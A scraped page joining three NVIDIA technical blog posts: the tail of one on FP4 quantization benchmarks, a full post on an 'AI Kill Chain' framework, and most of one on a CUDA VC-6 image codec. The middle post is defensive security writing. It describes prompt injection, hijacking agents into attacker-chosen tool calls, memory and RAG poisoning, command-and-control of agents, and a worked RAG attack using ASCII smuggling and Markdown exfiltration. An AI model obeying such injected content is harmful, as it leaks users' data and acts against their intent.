Figure 7 below shows accuracy for Llama-Nemotron Nano across common VLM benchmarks for both NVFP4 and MXFP4. Across benchmarks like AI2D, ChartQA, and DocVQA, we see NVFP4 consistently scoring higher by less than 1%. Though small, these small differences can lead to observable impact in real-world tasks. On the OpenVLM Hugging Face Leaderboard, the performance gap between the top model and lower-ranked models on a given benchmark is often just a few points.

Bar chart titled “Llama-Nemotron Nano VLM – Model Evaluation Accuracy MXFP4 and NVFP4 (Higher is Better).” The x axis is Model Evaluation with five tasks: AI2D, ChartQA, InfoVQA, OCRBench, and DocVQA. The y axis is Accuracy. Each task shows two bars: light gray labeled MXFP4 QAD and green labeled NVFP4 QAD. Numeric labels above bars read approximately: AI2D 98.58 and 98.70, ChartQA 98.84 and 98.96, InfoVQA 95.60 and 99.07, OCRBench 99.88 and 100.00, DocVQA 99.56 and 99.89. NVFP4 QAD bars are equal to or higher than MXFP4 QAD across all tasks, with the largest gap on InfoVQA.
Figure 7. Comparison of QAD 4-bit precision model evaluation accuracy for NVFP4 and MXFP4 formats relative to the original precision.

A larger gap is observed between visual question answering (VQA) like InfoVQA and DocVQA. InfoVQA and DocVQA both ask questions about images, but they stress different things during inference. InfoVQA’s dataset is composed of busy charts and complex graphics with tiny numbers, thin lines, and nuanced annotations. When the model is quantized to 4 bits, we risk rounding away the model’s ability to detect those small details. NVFP4 helps here because it uses finer-grained scaling (smaller blocks and higher-precision scale factors), which better preserves both small signals and occasional outliers—yielding steadier alignment between the visual and text components of the model (less rounding/clipping error).

DocVQA, by contrast, is mostly clean, structured documents (forms, invoices, receipts) where once the right field is found, the answer is obvious—so both formats are already near the ceiling, and the gap stays small.

Summary

Quantization aware training (QAT) and quantization aware distillation (QAD) extend the benefits of PTQ by teaching models to adapt directly to low-precision environments, recovering accuracy where simple calibration falls short. As shown in benchmarks like Math-500 and AIME 2024, these techniques can close the gap between low-precision inference and full-precision baselines, giving developers the best of both worlds: the efficiency of FP4 execution and the robustness of high-precision training. Considerations must be made for dataset selection and training hyperparameters as these can have a significant impact on the result of this technique. 

With TensorRT Model Optimizer, these advanced workflows are accessible through familiar PyTorch and Hugging Face APIs, making it easy to experiment with formats such as NVFP4 and MXFP4. Whether you need the speed of PTQ, the resilience of QAT, or the accuracy gains of QAD, you have a complete toolkit to compress, fine-tune, and deploy models on NVIDIA GPUs. The result is faster, smaller, and more accurate AI—ready for production at scale. 

To explore further, check out our Jupyter notebook tutorials.

Modeling Attacks on AI-Powered Apps with the AI Kill Chain Framework

AI-powered applications are introducing new attack surfaces that traditional security models don’t fully capture, especially as these agentic systems gain autonomy. The guiding principle for the evolving attack surface is clear: Assume prompt injection. But turning that into effective defenses is rarely straightforward.

The Cyber Kill Chain security framework defines how attackers operate. At NVIDIA, we built the AI Kill Chain to show how adversaries compromise AI applications and demonstrate where defenders can break the chain. Unlike models that highlight attackers using AI, this framework focuses on attacks against AI systems themselves.

In this blog, we’ll outline the stages, show examples, and connect it to other security models.

Diagram of the AI Kill Chain showing five stages: recon, poison, hijack, persist, and impact, with an iterate/pivot loop connecting persist back to poison to show attack cycles in agentic systems.
Figure 1. NVIDIA AI Kill Chain: stages of an attack on AI-powered applications

Our AI Kill Chain consists of five stages—recon, poison, hijack, persist, and impact—with an iterate/pivot branch. In the next sections, we’ll dive deeper into each stage of the AI Kill Chain, as shown above in Figure 1. 

What happens during the recon stage of the AI Kill Chain? 

In the recon stage, the attacker maps the system to plan their attack. Key questions an attacker is asking at this point include:

  • What are the routes by which data I control can get into the AI model? 
  • What tools, Model Context Protocol (MCP) servers, or other functions does the application use that might be exploitable?
  • What open source libraries does the application use?
  • Where are system guardrails applied, and how do they work?
  • What kinds of system memory does the application use?

Recon is often interactive. Attackers will probe the system to observe errors and behavior. The more observability they gain into the system’s behavior, the more precise their next steps become.

Defensive priorities to break recon: 

  1. Access control: Limit system access to authorized users.
  2. Minimize information: Sanitize error messages, scrub system prompts, guardrail disclosures and component identifiers from outputs.
  3. Monitor for probing behaviors: Implement telemetry to detect unusual inputs or access patterns indicative of recon.
  4. Harden models: Fine-tune models to resist transfer attacks and sensitive information elicitation.

Disrupting recon early prevents attackers from gaining the knowledge they need to execute precise attacks later in the Kill Chain.

How do attackers poison AI systems in this stage?

In the poison stage, the attacker’s goal is to place malicious inputs into locations where they will ultimately be processed by the AI model. Two primary techniques dominate:

  • Direct prompt injection: The attacker is the user, and provides inputs via normal user interactions. Impact is typically scoped to the attacker’s session but is useful for probing behaviors.
  • Indirect prompt injection: The attacker poisons data that the application ingests on behalf of other users (e.g., RAG databases, shared documents). This is where impact scales.

Text-based prompt injection is the most common technique. However, there are others such as:

  • Training data poisoning: Injecting tainted data into datasets used for fine-tuning or training models.
  • Adversarial example attacks: Bit-level manipulation of inputs (images, audio, etc.) to force misclassification.
  • Visual payloads: Malicious symbols, stickers, or hidden data that influence model outputs in physical contexts (e.g., autonomous vehicles).

Defensive priorities to break poison:

  • Sanitize all data: Don’t assume internal pipelines are safe, and apply guardrails to user inputs, RAG sources, plugin data, and API feeds (a minimal sanitization sketch follows this list).
  • Rephrase inputs: Transform content before ingestion to disrupt attacker-crafted payloads.
  • Control data ingestion: Sanitize any publicly writable data sources before ingestion.
  • Monitor ingestion: Watch for unexpected data spikes, anomalous embeddings, or high-frequency contributions to ingestion pipelines.
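
As one narrow, concrete instance of the sanitization guidance above, the sketch below strips Unicode tag characters (used for ASCII smuggling) and other invisible code points from text before it enters an ingestion pipeline. The character ranges are illustrative; production pipelines would layer this with prompt injection detection and guardrails.

# Strip invisible characters commonly abused to hide prompt injections
# (Unicode tag block, zero-width characters) before ingestion. Illustrative
# only; combine with prompt injection detection and guardrails in practice.
import re

INVISIBLE = re.compile(
    "["
    "\U000E0000-\U000E007F"  # Unicode tag characters (ASCII smuggling)
    "\u200B-\u200F"          # zero-width and directional marks
    "\u2060-\u2064"          # word joiner and invisible operators
    "\uFEFF"                 # zero-width no-break space / BOM
    "]"
)

def sanitize_for_ingestion(text: str) -> str:
    return INVISIBLE.sub("", text)

print(sanitize_for_ingestion("normal text\U000E0041\U000E0042 with hidden payload"))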

How do attackers hijack AI model behavior once poisoning succeeds?

The hijack stage is where the attack becomes active. Malicious inputs, successfully placed in the poison stage, are ingested by the model, hijacking its output to serve attacker objectives. Common hijack patterns include:

  • Attacker-controlled tool use: Forcing the model to call specific tools with attacker-defined parameters.
  • Data exfiltration: Encoding sensitive data from the model’s context into outputs (e.g., URLs, CSS, file writes).
  • Misinformation generation: Crafting responses that are deliberately false or misleading.
  • Context-specific payloads: Triggering malicious behavior only in targeted user contexts.

In agentic workflows, hijack becomes even more powerful. The elevated autonomy given to the LLM means that attackers can manipulate the model’s goals, not just outputs, steering it to execute unauthorized actions autonomously.  

Defensive priorities to break hijack:

  • Segregate trusted vs. untrusted data: Avoid processing  attacker-controlled and sensitive data in the same model context.
  • Harden model robustness: Use adversarial training, robust RAG, techniques such as CaMeL, or instruction hierarchy techniques to train models to resist injection patterns.
  • Validate tool calls contextually: Ensure every tool invocation aligns with the original user request (see the sketch after this list).
  • Implement output-layer guardrails: Inspect model outputs for intent, safety, and downstream impact before use.
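
The sketch below illustrates one narrow slice of contextual tool-call validation: an allowlist plus per-tool argument checks applied before any invocation is executed. The tool names, schemas, and domain allowlist are hypothetical; real systems also need to check semantic alignment with the user's original request.

# Narrow illustration of tool-call validation: an allowlist plus per-tool
# argument checks before execution. Tool names and schemas are hypothetical.
from urllib.parse import urlparse

ALLOWED_TOOLS = {
    "search_docs": {"query": str},
    "fetch_url": {"url": str},
}
ALLOWED_DOMAINS = {"docs.internal.example.com"}

def validate_tool_call(name: str, args: dict) -> bool:
    schema = ALLOWED_TOOLS.get(name)
    if schema is None:
        return False  # unknown tool
    if set(args) != set(schema):
        return False  # unexpected or missing arguments
    if any(not isinstance(args[k], t) for k, t in schema.items()):
        return False  # wrong argument types
    if name == "fetch_url":
        host = urlparse(args["url"]).hostname or ""
        if host not in ALLOWED_DOMAINS:
            return False  # block likely exfiltration targets
    return True

print(validate_tool_call("fetch_url", {"url": "https://attacker.example/x"}))  # False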

Hijack is the critical point where an attacker gains functional control. Breaking the chain here protects downstream systems, even if poisoning wasn’t fully prevented.

How do attackers persist their influence across sessions and systems?

Persistence allows attackers to turn a single hijack into ongoing control. By embedding malicious payloads into persistent storage, attackers ensure their influence survives within and across user sessions. Persistence paths depend on the application’s design:

  • Session history persistence: In many apps, injected prompts remain active within the live session.
  • Cross-session memory: In systems with user-specific memories, attackers can embed payloads that survive across sessions.
  • Shared resource poisoning: Attackers target shared databases (e.g., RAG sources, knowledge bases) to impact multiple users.
  • Agentic plan persistence: In autonomous agents, attackers hijack the agent’s goals, ensuring continued pursuit of attacker-defined goals.

Persistence enables attackers to repeatedly exploit hijacked states, increasing the likelihood of downstream impact. In agentic systems, persistent payloads can evolve into autonomous attacker-controlled workflows.

Defensive priorities to break persist:

  • Sanitize before persisting: Apply guardrails to all data before sending to session history, memory, or shared resources.
  • Provide user-visible memory controls: Let users see, manage, and delete their stored memories.
  • Contextual memory recall: Ensure memories are retrieved only when relevant to the current user’s request.
  • Enforce data lineage and auditability: Track data throughout its lifecycle to enable rapid remediation.
  • Control write operations: Require human approval or stronger sanitization for any data writes that could impact shared system state.

Persistence allows attackers to escalate from a single point-in-time attack to continuous presence in an AI powered application, potentially impacting multiple sessions.

How do attackers iterate or pivot to expand their control in agentic systems?

For simple applications, a single hijack might be the end of the attack path. But in agentic systems, where AI models plan, decide, and act autonomously, attackers exploit a feedback loop: iterate and pivot. Once an attacker successfully hijacks model behavior, they can:

  • Pivot laterally: Poison additional data sources to affect other users or workflows, scaling persistence.
  • Iterate on plans: In fully agentic systems attackers can rewrite the agent’s goals, replacing them with attacker-defined ones.
  • Establish command and control (C2): Embed payloads that instruct the agent to fetch new attacker-controlled directives on each iteration.

This loop transforms a single point of compromise into systemic exploitation. Each iteration reinforces the attacker’s position and impact, making the system progressively harder to secure.

Defensive priorities to break iterate/pivot:

  • Restrict tool access: Limit which tools, APIs, or data sources an agent can interact with, especially in untrusted contexts.
  • Validate agent plans continuously: Implement guardrails that ensure agent actions stay aligned with the original user intent.
  • Segregate untrusted data persistently: Prevent untrusted inputs from influencing trusted contexts or actions, even across iterations.
  • Monitor for anomalous agent behaviors: Detect when agents deviate from expected task flows, escalate privileges, or access unusual resources.
  • Apply human-in-the-loop on pivots: Require manual validation for actions that change the agent’s operational scope or resource access.

Iterate/pivot is how attacker influence compounds in agentic systems. Breaking this loop is essential to prevent small hijacks from escalating into large-scale compromise.

What kinds of impacts do attackers achieve through compromised AI systems?

Impact is where the attacker’s objectives materialize by forcing hijacked model outputs to trigger actions that affect systems, data, or users beyond the model itself.

In AI-powered applications, impact happens when outputs are connected to tools, APIs, or workflows that execute actions in the real world:

  • State-changing actions: Modifying files, databases, or system configurations.
  • Financial transactions: Approving payments, initiating transfers, or altering financial records.
  • Data exfiltration: Encoding sensitive data into outputs that leave the system (e.g., via URLs, CSS tricks, or API calls).
  • External communications: Sending emails, messages, or commands impersonating trusted users.

The AI model itself often cannot cause impact; its outputs do. Security must extend beyond the model to control how outputs are used downstream.

Defensive priorities to break impact:

  • Classify sensitive actions: Identify which tool calls, APIs, or actions have the ability to change external state or expose data.
  • Wrap sensitive actions with guardrails: Enforce human-in-the-loop approvals or automated policy checks before execution.
  • Design for least privilege: Tools should be narrowly scoped to minimize misuse; avoid multifunction APIs that broaden the attack surface.
  • Sanitize outputs: Strip payloads that can trigger unintended actions (e.g., scripts, file paths, untrusted URLs); a minimal sketch follows this list.
  • Use Content Security Policies (CSP): Prevent frontend-based exfiltration methods, like loading malicious URLs or inline CSS attacks.
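
As one concrete instance of the output-sanitization bullet above, the sketch below removes Markdown images and rewrites non-allowlisted links in model output so that only plain text and approved domains survive, blocking the common Markdown/URL exfiltration pattern discussed in the RAG example later in this post. The patterns and domain allowlist are illustrative.

# Strip Markdown images and non-allowlisted links from LLM output before it
# reaches the frontend, blocking Markdown/URL exfiltration. Illustrative only.
import re
from urllib.parse import urlparse

ALLOWED_DOMAINS = {"docs.internal.example.com"}
MD_IMAGE = re.compile(r"!\[[^\]]*\]\([^)]*\)")
MD_LINK = re.compile(r"\[([^\]]*)\]\(([^)]*)\)")
BARE_URL = re.compile(r"https?://\S+")

def allowed(url: str) -> bool:
    return (urlparse(url).hostname or "") in ALLOWED_DOMAINS

def sanitize_output(text: str) -> str:
    text = MD_IMAGE.sub("", text)  # drop images entirely
    text = MD_LINK.sub(
        lambda m: m.group(0) if allowed(m.group(2)) else m.group(1), text
    )  # keep link text, drop untrusted targets
    return BARE_URL.sub(
        lambda m: m.group(0) if allowed(m.group(0)) else "[link removed]", text
    )

print(sanitize_output("See ![x](https://evil.example/p?d=SECRET) and [doc](https://evil.example/a)"))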

Robust downstream controls on tool invocation and data flows can often contain attacker reach.

How can the AI Kill Chain be applied to a real-world AI system example?

In this section, we’ll use the AI Kill Chain to analyze a simple RAG application and how it might be used to exfiltrate data. We’ll show how we can improve its security by attempting to interrupt the AI Kill Chain at each step.

Architecture diagram of a simple Retrieval-Augmented Generation (RAG) application. Shows how user queries pass through embedding, reranking, and LLM components connected to a vector database. Highlights how attackers can poison data sources, hijack outputs, and trigger exfiltration as the RAG pipeline processes inputs.
Figure 2. Architecture diagram of a simple RAG application

An attacker’s journey through the AI Kill Chain might look something like this:

  • Recon: The attacker sees that three models are used: embedding, reranking, and an LLM. They examine open source documentation for known vulnerabilities, as well as user-facing system documentation to see what information is stored in the vector database. Through interaction with the system, they attempt to profile model behavior and elicit errors from the system, hoping to gain more information about the underlying software stack. They also experiment with various forms of content injection, looking for observable impact.
    • The attacker discovers documentation that suggests that valuable information is contained in the vector database, but locked behind access control. Their testing reveals that developer forum comments are also collected by the application, and that the web frontend is vulnerable to inline style modifications, which may permit data exfiltration. Finally, they discover that ASCII smuggling is possible in the system, indicating that those characters are not sanitized and can affect the LLM behavior.
  • Poisoning: Armed with the knowledge from the recon step, the attacker crafts a forum post, hoping it will be ingested into the vector database. Within the post they embed, via ASCII smuggling, a prompt injection containing a Markdown data exfiltration payload. This post is later retrieved by an ingestion worker and inserted into the vector database.
    • Mitigations: Publicly writable data sources such as public forums should be sanitized before ingestion. Introducing guardrails or prompt injection detection tools like NeMoGuard-JailbreakDetect as part of the filtering step can help complicate prompt injection through these sources. Adding filtering of ASCII smuggling characters can make it more difficult to inject hidden prompt injections, raising the likelihood of detection.
  • Hijack: When a different user asks a question related to the topic of the attacker's forum post, that post is returned by the vector database and, along with the hidden prompt injection, is included in the augmented prompt sent to the LLM. The model executes the prompt injection and is hijacked: all related documents are encoded and prepared for exfiltration via Markdown.
    • Mitigations: Segregate trusted and untrusted data during processing. Had the untrusted forum data been processed separately from the internal (trusted) data in two separate LLM calls, the LLM would not have had the trusted internal data available to encode when hijacked by the prompt injection in the untrusted data. Rephrasing or summarizing each input would also make it harder for a prompt injection to survive and execute.
  • Persist: In this case, persistence is automatic. As long as the poisoned data is retained in the vector database, additional queries will be able to trigger it.
    • Mitigations: Data segregation here, combined with careful audit logging of included sources, could reduce the blast radius of the attack, and allow for detection and removal of the tainted data.
  • Impact: When the LLM response, containing the LLM-generated data exfiltration payload, is loaded by the victim's browser in the RAG application frontend, it triggers a request to an attacker-controlled server. At this point, the data is exfiltrated and the attack (in this interaction) is complete.
    • Mitigations: Removing any URLs from the LLM-produced output prevents many exfiltration attacks in this class (a minimal sketch follows below). Content segregation (above) would prevent anything but untrusted data from being exfiltrated. Finally, strong content security policies on the frontend can block requests to untrusted domains, blocking the exfiltration itself.
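The sketch below shows the URL-stripping mitigation, assuming the RAG frontend renders model output as Markdown/HTML. The regular expressions are illustrative; a production filter would be stricter and paired with a CSP.

# Minimal sketch: strip Markdown images and raw URLs from model output before display,
# so hijacked output cannot trigger requests to attacker-controlled servers.
import re

URL_PATTERN = re.compile(r"https?://\S+", re.IGNORECASE)
MD_IMAGE_PATTERN = re.compile(r"!\[[^\]]*\]\([^)]*\)")   # e.g., ![x](http://evil/?data=...)

def sanitize_llm_output(text: str) -> str:
    """Remove Markdown images and raw URLs from model output before rendering."""
    text = MD_IMAGE_PATTERN.sub("[image removed]", text)
    text = URL_PATTERN.sub("[link removed]", text)
    return text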

Because this application is only a “Level 1” agent with a deterministic process flow, the iterate/pivot step is not exercised.

Conclusion

Securing AI requires understanding how AI changes the attack surface, and building layered defenses that scale with autonomy levels. As enterprises deploy LLMs, RAG systems, and agentic workflows, attackers are actively evolving their methods to exploit these AI-driven systems. 

The AI Kill Chain provides a clear, actionable way to break down how these attacks unfold—stage by stage. It helps teams move beyond generalized “prompt injection” concerns to see where, how, and why attackers can escalate their control. At NVIDIA, we operationalize many of these defenses through technologies like NeMo Guardrails, Jailbreak Detection NIMs, and architectural best practices. 

Learn more about best practices for securing LLM-enabled applications, the framework for understanding agentic autonomy levels and security, and our NVIDIA AI red team. 

[ad_2]

Modeling Attacks on AI-Powered Apps with the AI Kill Chain Framework

Build High-Performance Vision AI Pipelines with NVIDIA CUDA-Accelerated VC-6

[ad_1]

The constantly increasing compute throughput of NVIDIA GPUs presents a new opportunity for optimizing vision AI workloads: keeping the hardware fed with data. As GPU performance continues to scale, traditional data pipeline stages, such as I/O from storage, host-to-device data transfers (PCIe), and CPU-bound processing like decoding and resizing, don’t always keep pace. This disparity can create a bottleneck where the accelerator is left waiting for data, a challenge often called GPU starvation. Closing this data-to-tensor gap requires a smarter data pipeline designed to align with modern, high-performance hardware.

This post introduces the NVIDIA CUDA-accelerated implementation of SMPTE VC-6 (ST 2117-1), a codec architected for massively parallel computation. We explore how VC-6’s native features, such as its hierarchical multi-resolution structure and selective decoding and fetching, are a natural fit for the parallel architecture of GPUs. By directly mapping the codec’s inherent parallelism to a GPU’s architecture, we can build a more efficient path from compressed bits to model-ready tensors. We’ll cover the performance gains of moving from CPU and OpenCL to a CUDA implementation, demonstrating how this approach delivers accelerated decode that demanding AI applications can easily consume.

What is VC-6?

SMPTE VC-6 is an international standard for image and video coding designed from the ground up for direct, efficient interaction with modern compute architectures, particularly GPUs. Instead of encoding an image as a single, flat block of pixels, VC-6 generates an efficient multi-resolution hierarchy. Figure 1 shows an example demonstrating powers-of-two downscaling between resolutions (8K, 4K, Full HD).

Figure 1. VC-6 hierarchical reconstruction

The encoding process works as follows:

  1. The source image is recursively downsampled to create multiple layers, called echelons, each representing a different level of quality (LoQ).
  2. The smallest echelon serves as the lowest-resolution, or root, LoQ and is encoded directly.
  3. The encoder then reconstructs upwards. For each higher level, it upsamples the lower-resolution version and subtracts it from the original to capture the difference, or residuals.
  4. The final bitstream contains the root LoQ followed by these successive residual layers.
Figure 2. VC-6 encoder pipeline

The VC-6 decoder can reverse the process successively through every LoQ. This is done by starting with the root LoQ, upsampling to the next LoQ, and adding the corresponding residuals, until the target resolution/LoQ is reached. Crucially, every component, whether it’s a color plane, an echelon, or a specific image tile, can be accessed and decoded independently and in parallel. This structure (a minimal sketch follows the list below) allows developers to:

  • Transfer only the bytes that matter, reducing I/O, bandwidth, memory use, and memory accesses while maximizing throughput.
  • Decode only what’s needed, at any LoQ, producing tensors closer to the model’s required input size without a full decode and resize.
  • Access specific regions of interest (RoI) within each LoQ instead of processing the entire frame, saving significant computation.
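To make the hierarchical encode/decode flow concrete, here is a minimal NumPy sketch of the residual-pyramid idea. It is illustrative only: real VC-6 adds S-tree structuring, tiling, and entropy coding, and none of these function names are part of the VC-6 SDK.

# Toy residual pyramid: encode a root LoQ plus residual layers, then reconstruct upwards.
import numpy as np

def downsample(img):
    """Powers-of-two downscale by 2x2 averaging."""
    h, w = img.shape
    return img.reshape(h // 2, 2, w // 2, 2).mean(axis=(1, 3))

def upsample(img):
    """Nearest-neighbor 2x upscale."""
    return img.repeat(2, axis=0).repeat(2, axis=1)

def encode(img, levels=2):
    """Return the root LoQ plus residual layers, smallest layer first."""
    pyramid = [img]
    for _ in range(levels):
        pyramid.append(downsample(pyramid[-1]))
    root = pyramid[-1]
    residuals = [pyramid[i] - upsample(pyramid[i + 1]) for i in range(levels - 1, -1, -1)]
    return root, residuals

def decode(root, residuals, stop_at=None):
    """Reconstruct upwards; stop early to produce a lower-LoQ surface."""
    out = root
    for i, res in enumerate(residuals):
        if stop_at is not None and i >= stop_at:
            break
        out = upsample(out) + res
    return out

img = np.random.rand(8, 8)
root, residuals = encode(img, levels=2)
assert np.allclose(decode(root, residuals), img)   # lossless in this toy setup

Because each residual layer depends only on the layer below it, a decoder can stop early to produce a lower-LoQ surface, which mirrors the selective-resolution decode described above.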

The following table summarizes the architectural benefits of VC-6:

  • Core architecture: Hierarchical, S-tree predictive, parallel.
  • Selective data recall: Native support. The bitstream structure allows fetching only the bytes required for a partial request.
  • Selective resolution (LoQ) decode: Native support. Intrinsic to the hierarchical LoQ structure; produces a surface near the target size without a full decode and resize.
  • RoI decode: Native support. Intrinsic to the navigable S-tree structure; pulls just the tiles that matter for the model stage.
  • Parallel decode capability: Massively parallel. Plane/LoQ/tiled residual independence enables fine-grained GPU parallelism.
  • Max bit depth: Up to 31 bits per component.
  • Multi-plane support: Native, up to 255 planes (e.g., RGB, alpha, depth).

Table 1. SMPTE VC-6 (ST 2117) capabilities for AI

As the table highlights, VC-6’s native support for selective resolution, RoI decoding, and especially selective data recall makes it well suited for AI pipelines where efficiency and targeted data access are paramount.

I/O reduction with partial data recall

Beyond decode speed, VC-6’s ability to selectively recall data dramatically reduces I/O. Traditional codecs typically require reading the entire file, even for lower-resolution outputs. With VC-6, you only fetch the bytes needed for the target LoQ, RoI, or plane (i.e., color space). For CPU decoding, the benefit is fewer bytes from the network or storage to RAM. For GPU decoding, this also holds with the addition of reduced PCIe memory bandwidth and VRAM usage.

As illustrated in Figure 3, on the first 100 images of the DIV2K dataset (where one dimension is equal to 2,040 pixels and the other varies), we observed:

  • LoQ1 (medium resolution, 1,020 pixels) transfers ~63% of the total file bytes.
  • LoQ2 (low-resolution, 510 pixels) transfers ~27%.
Figure 3. Average file size required to decode different LoQ, 3 bpp example

That translates to I/O savings of ~37% and ~72% respectively, versus full‑resolution, proportionally reducing network, storage, PCIe, and memory traffic. You can subsequently fetch the remaining layers (or only the tiles for a small RoI) without reprocessing the entire file. For data loaders, this is an immediate way to lift throughput or increase batch sizes without changing model code.

Mapping VC-6 to GPU: a natural fit for parallelism

The architecture of VC-6 aligns well with the GPU’s single instruction, multiple thread (SIMT) execution model. Its design intentionally minimizes inter-dependencies to facilitate massive parallelism.

  • Component independence: Image data is partitioned into tiles, planes, and echelons that can be processed independently. VC-6 encodes the information needed for independent tile decoding in a way that enables parallel processing of hundreds of thousands of tiles with minimal impact on compression efficiency.
  • Simple, local operations: Unlike codecs using block-based DCT or wavelets, VC-6’s core pixel transforms operate on small, independent 2×2 pixel neighborhoods, which simplifies GPU kernel design.
  • Memory efficiency: The entropy coding is designed to be inherently massively parallel, and lookups have a very low memory footprint, with tables small enough to fit into shared memory or even registers, making the process highly suitable for SIMT execution.

Although the term hierarchy may suggest serial processing, VC-6 has minimized the inter-dependency by incorporating two hierarchies that operate in largely orthogonal dimensions, offering a unique structure for concurrent processing. 

This architectural parallelism, originally used for low-latency, random-access video editing workflows in the CPU and OpenCL versions, is also a perfect match for the high-throughput demands of AI.

AI training pipelines are designed to maximize throughput, where a framework like the PyTorch DataLoader spawns parallel processes to hide latency. Much like advanced editing systems, these AI workflows require fast, on-demand access to different resolutions and regions of an image. The opportunity to apply these features to accelerate AI workloads was the primary driver for creating a dedicated CUDA implementation. A native CUDA library enables targeted optimizations that maximize throughput, fully leveraging VC-6’s architectural strengths for the AI ecosystem.

VC-6 Python library with CUDA acceleration

V-Nova and NVIDIA collaborated to optimize VC-6 for the CUDA platform, recognizing that it’s the de facto standard in the AI ecosystem. Porting VC-6 from OpenCL ensures seamless integration with tools like PyTorch and the broader AI pipeline without additional CPU copies or synchronization points.

Moving VC-6 to CUDA provides several key advantages:

  • Minimizes overhead: It avoids the expensive context-switching overhead between AI workloads and the OpenCL implementation.
  • Enhances interoperability: It provides direct integration with the CUDA Tensor ecosystem. CUDA streams enable memory exchange without the need for CPU synchronization.
  • Unlocks advanced profiling: It enables the use of powerful tools like NVIDIA Nsight Systems and NVIDIA Nsight Compute to identify and address performance bottlenecks.
  • GPU hardware intrinsics: With CUDA, it becomes possible to use all available hardware intrinsics on NVIDIA GPUs.

The current VC-6 CUDA path is in alpha, with native batching and further optimizations on the roadmap, which are enabled through CUDA and are motivated by new AI requirements. Even at this stage, the performance gains over OpenCL and the CPU implementation are already significant, providing a strong foundation on which further development and improvements will continue to build.

Installation and usage

The VC-6 Python package is distributed as a pre-compiled Python wheel, enabling straightforward installation through pip. Following this, you can create VC-6 codec objects and start encoding, decoding, and transcoding. An example of how to encode and decode a VC-6 bitstream follows (visit our GitHub repo for more complete samples):

from vnova.vc6_cuda12 import codec as vc6codec    # for CUDA
# from vnova.vc6_opencl import codec as vc6codec  # for OpenCL
# from vnova.vc6_metal import codec as vc6codec   # for Metal

# Set up encoder and decoder instances
encoder = vc6codec.EncoderSync(1920, 1080, vc6codec.CodecBackendType.CPU,
                               vc6codec.PictureFormat.RGB_8, vc6codec.ImageMemoryType.CPU)
encoder.set_generic_preset(vc6codec.EncoderGenericPreset.LOSSLESS)
decoder = vc6codec.DecoderSync(1920, 1080, vc6codec.CodecBackendType.CPU,
                               vc6codec.PictureFormat.RGB_8, vc6codec.ImageMemoryType.CPU)

# Encode a raw RGB frame from disk, then decode the bitstream back to a file
encoded_image = encoder.read("example_1920x1080_rgb8.rgb")
decoder.write(encoded_image.memoryview, "recon_example_1920x1080_rgb8.rgb")

GPU memory output

In the case of the CUDA package (vc6_cuda12), the decoder output can expose a CUDA array interface. To enable this feature, create the decoder with a GPU device output memory type (ImageMemoryType.CUDA_DEVICE in the example below). With that, the output images will have __cuda_array_interface__ and can be used with other libraries like CuPy, PyTorch, and nvImageCodec.

from vnova.vc6_cuda12 import codec as vc6codec   # for CUDA only
import cupy

# Set up a GPU decoder instance with CUDA device output
decoder = vc6codec.DecoderSync(1920, 1080, vc6codec.CodecBackendType.CPU,
                               vc6codec.PictureFormat.RGB_8, vc6codec.ImageMemoryType.CUDA_DEVICE)

# Decode from file
decoded_image = decoder.read("example_1920x1080_rgb8.vc6")

# Wrap the decoded image in a CuPy array, download to CPU, and write to file
cuarray = cupy.asarray(decoded_image)
with open("reconstruction_example_1920x1080_rgb8.rgb", "wb") as decoded_file:
    decoded_file.write(cuarray.get().tobytes())

For sync and async decoders, accessing __cuda_array_interface__ is blocking and implicitly waits for the result to be ready in the image.

The __cuda_array_interface__ always contains one-dimensional data of unsigned 8-bit type, like the CPU version. Adjusting dimensions (or the type in case of 10-bit formats) is up to the user.
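For example, building on the snippet above, the flat uint8 buffer can be reshaped and handed to PyTorch without leaving the GPU. This is a sketch under assumptions: it reuses decoded_image from the previous snippet, assumes a 1080x1920x3 RGB_8 layout from the decoder configuration, and relies on torch.as_tensor consuming objects that expose __cuda_array_interface__.

import cupy
import torch

# Assumes `decoded_image` from the previous snippet (1920x1080, RGB_8, CUDA device output).
cuarray = cupy.asarray(decoded_image)            # zero-copy view of the decoder output
frame = cuarray.reshape(1080, 1920, 3)           # HWC, uint8 (layout assumed)
tensor = torch.as_tensor(frame, device="cuda")   # zero-copy via __cuda_array_interface__
tensor = tensor.permute(2, 0, 1).float() / 255.0 # CHW float tensor ready for a model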

Partial decode and IO operations

To perform a partial decoding, decoder functions accept an optional parameter that describes the region of interest. In the following example, the decoder will only read and process the data required for decoding the quarter-resolution image.

# Read and decode quarter resolution (echelon 1).
# FrameRegion can also be used to describe a target rectangle.
decoded_image = decoder.read("example_1920x1080_rgb8.vc6", vc6codec.FrameRegion(echelon=1))

Partial data recall is also possible with the other decode functions that operate on memory rather than file paths. For that purpose, a utility function is exposed by the VC-6 library to separately peek at the file header and report the required size for the target LoQ. The exact usage is shown in the GitHub samples.

Performance benchmarks: CPU compared to OpenCL and CUDA

We evaluated VC-6 on an NVIDIA RTX PRO 6000 Blackwell Server Edition using the DIV2K dataset (800 images), measuring per-image decode time across the CPU, OpenCL (GPU), and CUDA implementations for different LoQs. For batched tests, we used a “pseudo-batch” approach, which simulates native batching by running multiple asynchronous single-image decoders in parallel to maximize throughput. The same harness can be used to reproduce the results, which are illustrated in Figure 4.
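For illustration, a pseudo-batch run can be sketched with a thread pool of independent decoders. This is a sketch only: the file names and frame dimensions are placeholders, and it reuses the DecoderSync API from the earlier snippets rather than the actual benchmark harness distributed with the SDK.

# Pseudo-batch sketch: several independent single-image decoders running in parallel
# threads to keep the GPU busy. Paths and sizes are illustrative.
from concurrent.futures import ThreadPoolExecutor
from vnova.vc6_cuda12 import codec as vc6codec

files = [f"div2k_{i:04d}.vc6" for i in range(8)]   # placeholder file names

def decode_one(path):
    decoder = vc6codec.DecoderSync(1920, 1080, vc6codec.CodecBackendType.CPU,
                                   vc6codec.PictureFormat.RGB_8,
                                   vc6codec.ImageMemoryType.CUDA_DEVICE)
    return decoder.read(path)

with ThreadPoolExecutor(max_workers=8) as pool:
    images = list(pool.map(decode_one, files))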

Figure 4. VC-6 decoding performance across implementations (per-image decode time in milliseconds)

The move to CUDA shows a clear performance uplift.

  • For single-image decoding, CUDA is up to 13x faster than the CPU (1.24 ms vs. 15.95 ms).
  • When compared to the existing GPU implementation, the CUDA version is between 1.2x and 1.6x faster than OpenCL. In the future, CUDA will enable access to more dedicated hardware intrinsics that can be leveraged.
  • Efficiency improves with batching on all platforms, and we expect further uplift from a native batch decoder.

Profiling with Nsight and the road ahead

